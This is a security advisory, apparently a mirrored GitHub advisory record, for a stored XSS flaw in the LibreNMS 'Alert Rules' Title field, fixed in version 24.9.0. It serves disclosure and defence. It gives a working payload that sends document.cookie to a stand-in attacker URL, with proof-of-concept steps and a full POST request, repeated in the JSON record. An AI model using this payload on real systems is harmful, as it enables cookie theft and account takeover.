ghsa-j2j9-7pr6-xqwv
Vulnerability from github
Published
2024-10-01 20:31
Modified
2024-10-01 21:52
Severity ?
7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L
5.0 (Medium) - CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:H/SI:L/SA:L/E:P
Summary
LibreNMS has Stored Cross-site Scripting vulnerability in "Alert Rules" feature
Details

Summary

A Stored Cross-Site Scripting (XSS) vulnerability in the "Alert Rules" feature allows authenticated users to inject arbitrary JavaScript through the "Title" field. This vulnerability can lead to the execution of malicious code in the context of other users' sessions, potentially compromising their accounts and allowing unauthorized actions.

Details

The vulnerability occurs when creating an alert rule. The application does not properly sanitize user inputs in the "Title" field, which allows an attacker to escape the attribute context where the title is injected (data-content). Despite some character restrictions, the attacker can still inject a payload that leverages available attributes on the div element to execute JavaScript automatically when the page loads.

For example, the following payload can be used: test1'' autofocus onfocus="document.location='https://<attacker-url>/logger.php?c='+document.cookie"

This payload triggers the XSS when the affected page is loaded, automatically redirecting the user to the attacker's controlled domain with any non-httponly cookies present.

The vulnerability stems from the application not sanitizing the value of $rule['name'] before adding it to the $enabled_msg variable. This is evident in the code:

https://github.com/librenms/librenms/blob/9455173edce6971777cf6666d540eeeaf6201920/includes/html/print-alert-rules.php#L405

PoC

  1. Create a new alert rule in the LibreNMS interface.
  2. In the "Title" field, input the following payload: test1'' autofocus onfocus="document.location='https://<attacker-url>/logger.php?c='+document.cookie"
  3. Save the rule and trigger the alert.
  4. Observe that when the page loads, the injected JavaScript executes and redirects the user, sending their non-httponly cookies to the attacker's server.

Example Request: ```http POST /ajax_form.php HTTP/1.1 Host: X-Requested-With: XMLHttpRequest X-CSRF-TOKEN: Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Cookie:

_token=&device_id=-1&device_name=invalid+hostname&rule_id=17&type=alert-rules&template_id=&builder_json=%7B%22condition%22%3A%22AND%22%2C%22rules%22%3A%5B%7B%22id%22%3A%22access_points.accesspoint_id%22%2C%22field%22%3A%22access_points.accesspoint_id%22%2C%22type%22%3A%22string%22%2C%22input%22%3A%22text%22%2C%22operator%22%3A%22not_equal%22%2C%22value%22%3A%22test2'%5C%22%22%7D%5D%2C%22valid%22%3Atrue%7D&name=test1''+autofocus+onfocus%3D%22document.location%3D'https%3A%2F%2F%2Flogger.php%3Fc%3D'%2Bdocument.cookie%22&builder_rule_0_filter=access_points.accesspoint_id&builder_rule_0_operator=not_equal&builder_rule_0_value_0=test2'%22&severity=warning&count=1&delay=1m&interval=5m&recovery=on&acknowledgement=on&maps%5B%5D=1&proc=&notes=Test2'%22&override_query=on&adv_query=select+'test3'%22'%3B ```

Impact

It could allow authenticated users to execute arbitrary JavaScript code in the context of other users' sessions. Impacted users could have their accounts compromised, enabling the attacker to perform unauthorized actions on their behalf.

Show details on source website

To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "librenms/librenms"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "24.9.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-47525"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-10-01T20:31:13Z",
    "nvd_published_at": "2024-10-01T21:15:07Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\nA Stored Cross-Site Scripting (XSS) vulnerability in the \"Alert Rules\" feature allows authenticated users to inject arbitrary JavaScript through the \"Title\" field. This vulnerability can lead to the execution of malicious code in the context of other users\u0027 sessions, potentially compromising their accounts and allowing unauthorized actions.\n\n### Details\nThe vulnerability occurs when creating an alert rule. The application does not properly sanitize user inputs in the \"Title\" field, which allows an attacker to escape the attribute context where the title is injected (data-content). Despite some character restrictions, the attacker can still inject a payload that leverages available attributes on the div element to execute JavaScript automatically when the page loads.\n\nFor example, the following payload can be used:\n```test1\u0027\u0027 autofocus onfocus=\"document.location=\u0027https://\u003cattacker-url\u003e/logger.php?c=\u0027+document.cookie\"```\n\nThis payload triggers the XSS when the affected page is loaded, automatically redirecting the user to the attacker\u0027s controlled domain with any non-httponly cookies present.\n\nThe vulnerability stems from the application not sanitizing the value of $rule[\u0027name\u0027] before adding it to the $enabled_msg variable. This is evident in the code:\n\nhttps://github.com/librenms/librenms/blob/9455173edce6971777cf6666d540eeeaf6201920/includes/html/print-alert-rules.php#L405\n\n### PoC\n\n1. Create a new alert rule in the LibreNMS interface.\n2. In the \"Title\" field, input the following payload:\n```test1\u0027\u0027 autofocus onfocus=\"document.location=\u0027https://\u003cattacker-url\u003e/logger.php?c=\u0027+document.cookie\"```\n3. Save the rule and trigger the alert.\n4. Observe that when the page loads, the injected JavaScript executes and redirects the user, sending their non-httponly cookies to the attacker\u0027s server.\n\nExample Request:\n```http\nPOST /ajax_form.php HTTP/1.1\nHost: \u003cyour_host\u003e\nX-Requested-With: XMLHttpRequest\nX-CSRF-TOKEN: \u003cyour_XSRF_token\u003e\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nCookie: \u003cyour_cookie\u003e\n\n_token=\u003cyour_token\u003e\u0026device_id=-1\u0026device_name=invalid+hostname\u0026rule_id=17\u0026type=alert-rules\u0026template_id=\u0026builder_json=%7B%22condition%22%3A%22AND%22%2C%22rules%22%3A%5B%7B%22id%22%3A%22access_points.accesspoint_id%22%2C%22field%22%3A%22access_points.accesspoint_id%22%2C%22type%22%3A%22string%22%2C%22input%22%3A%22text%22%2C%22operator%22%3A%22not_equal%22%2C%22value%22%3A%22test2\u0027%5C%22%22%7D%5D%2C%22valid%22%3Atrue%7D\u0026name=test1\u0027\u0027+autofocus+onfocus%3D%22document.location%3D\u0027https%3A%2F%2F\u003cattacker_url\u003e%2Flogger.php%3Fc%3D\u0027%2Bdocument.cookie%22\u0026builder_rule_0_filter=access_points.accesspoint_id\u0026builder_rule_0_operator=not_equal\u0026builder_rule_0_value_0=test2\u0027%22\u0026severity=warning\u0026count=1\u0026delay=1m\u0026interval=5m\u0026recovery=on\u0026acknowledgement=on\u0026maps%5B%5D=1\u0026proc=\u0026notes=Test2\u0027%22\u0026override_query=on\u0026adv_query=select+\u0027test3\u0027%22\u0027%3B\n```\n\n### Impact\nIt could allow authenticated users to execute arbitrary JavaScript code in the context of other users\u0027 sessions. Impacted users could have their accounts compromised, enabling the attacker to perform unauthorized actions on their behalf.\n",
  "id": "GHSA-j2j9-7pr6-xqwv",
  "modified": "2024-10-01T21:52:21Z",
  "published": "2024-10-01T20:31:13Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/librenms/librenms/security/advisories/GHSA-j2j9-7pr6-xqwv"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-47525"
    },
    {
      "type": "WEB",
      "url": "https://github.com/librenms/librenms/commit/7620d220e48563938d869da7689b8ac3f7721490"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/librenms/librenms"
    },
    {
      "type": "WEB",
      "url": "https://github.com/librenms/librenms/blob/9455173edce6971777cf6666d540eeeaf6201920/includes/html/print-alert-rules.php#L405"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:H/SI:L/SA:L/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "LibreNMS has Stored Cross-site Scripting vulnerability in \"Alert Rules\" feature"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.